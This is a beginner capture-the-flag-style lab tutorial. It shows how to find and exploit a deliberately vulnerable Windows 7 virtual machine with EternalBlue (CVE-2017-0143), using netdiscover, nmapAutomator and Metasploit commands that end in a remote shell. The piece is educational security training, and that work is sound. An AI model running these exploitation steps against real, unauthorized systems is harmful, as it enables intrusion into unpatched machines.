Easy Mode: Hacking Your First Windows

Box (Lab)

Tj Houston, MBA

·
5 min read
·
Nov 5, 2022

Photo by Arget on Unsplash

I downloaded Kali Linux, now what? That’s what a lot of aspiring cybersecurity students
think. If you browse through the menus, you may be overwhelmed by what you see. Rest
assured, before you know it you will wrangle the dragon and start your ethical hacking
journey! Today we are going to do an easy lab in which we use one of the most well-known
exploits (Eternal Blue) to get access to a vulnerable box. This lab is to get you acclimated to a
few of the tools within Kali in a safe environment.

Note: This tutorial is for educational purposes only and you should only utilize these tools on
devices that you have express permission to access.
For this lab we are using virtual box. Before getting started you should have virtual box
downloaded and have a Kali machine installed as your attacking machine.

To get started, download the vulnerable machine for this lab:

https://drive.google.com/file/d/1vMszZFJpmULp_l60NU7WaUla0JIw7qi9/view?
usp=sharing

History of Eternal Blue — https://en.wikipedia.org/wiki/EternalBlue

Workspace Setup:
First things first, lets make sure Kali is up to date.

sudo apt update && sudo apt upgrade -y && sudo apt dist-upgrade -y && sudo
apt autoremove

I like to create tabs in the terminal for whatever tool I am using. This helps me keep
organized while I am working on a machine. You can do this in Kali by right-clicking on the
tab and giving it a name and changing the color.
Let’s just do a quick check to see what our IP address is by running

ifconfig

We can see that the IP address of our ethernet interface is 192.168.2.7

In most cases, especially with CTF machines, you will not know the IP address of the
machine you are targeting so you will need a way to find out. For this, there is a small but
useful program called netdiscover. Netdiscover will send out ARP packets to the desired
range to see what machines reply back. To run the netdiscover type the following. Note the
“/” notation is representing the subnet mask. In our case, we are only checking the devices in
the last octet, so we use the /24.

sudo netdiscover -r 192.168.2.0/24

It looks like our target machine is 192.168.2.8 (I had some issues so this changes to .10 when
we dive into Metasploit)

Enumeration:
Now that we have our target IP address we can start our enumeration. At this point, you can
use your scanner of choice. I prefer to use nMapAutomator because you constantly get
information as the scans are happening and you can be more efficient. You can find more
information about nMapAutomator here: https://github.com/21y4d/nmapAutomator

Once you have nMapAutomator downloaded you can use it to scan your host.

sudo ./nmapAutomator.sh — host 192.168.2.8 -type All

Within a few seconds we can already start to get information about the host:

As the tool runs in the background, let’s take a look at what is open on this machine. This is
our attack surface and these are the different ports open that we can try to utilize to make
our way in. When I see a scan like this I get excited because 139 and 445 being open tells us
that this machine is most likely using SMB so we can get more information about the domain
or it may be susceptible to Eternal Blue.

Scan Results:
After a few minutes, the scan finishes and we can see the results of the vulnerability scan:
Exploitation
For exploitation there is a great tool called Metasploit. Metasploit is a framework that brings
together a ton of different exploits and makes exploitation super easy. For more information
about the Metasploit project check out the Metasploit website https://www.metasploit.com/

Let’s see if we can utilize the information, we gained during our enumeration in Metasploit
and make our way into the system.

Create a new tab and start msfconsole

msfconsole
Once metasploit has started lets do a quick search to see if there is an exploit that we can use
that takes advantage of CVE-2017–0143.

To do this type:

search 2017–0143

This will tell us what exploits available and also which ones should have the most success.

Note: When you are looking at the different exploit options there are a few things to look out
for. First, it is important to find an exploit that does what you want it to do. In our case, we
want to get root access and we don’t have a foothold on the system so we want to find an
RCE exploit (Remote Code Execution). Also, take note of the rank of the exploit, in our case
we have a few normals, an average, and 1 that is ranked great.
Use the 1st exploit by typing

use 0

Once the exploit is loaded, let’s see what options are available by typing

show options

So for this exploit, we need to sent our RHOST (remote host) as well as our LHOST (local
host). We do this by typing

set rhost 192.168.2.10

set lhost 192.168.2.7

When we click run we can see the exploit kick-off and we get a remote shell into the
Windows 7 machine:
You have now attacked your first machine and successfully gained access to a remote
Windows machine from Kali Linux!

Bonus Challenge
For this machine we used the reverse shell, and we got access to a standard command prompt.
There is a cool tool built into Metasploit called meterpreter. ( https://www.offensive-
security.com/metasploit-unleashed/about-meterpreter/) How could you get access to this
machine but with the meterpreter shell instead of the standard Windows shell?

https://medium.tjhouston.com/easy-mode-hacking-your-first-windows-box-lab-d0adace066e5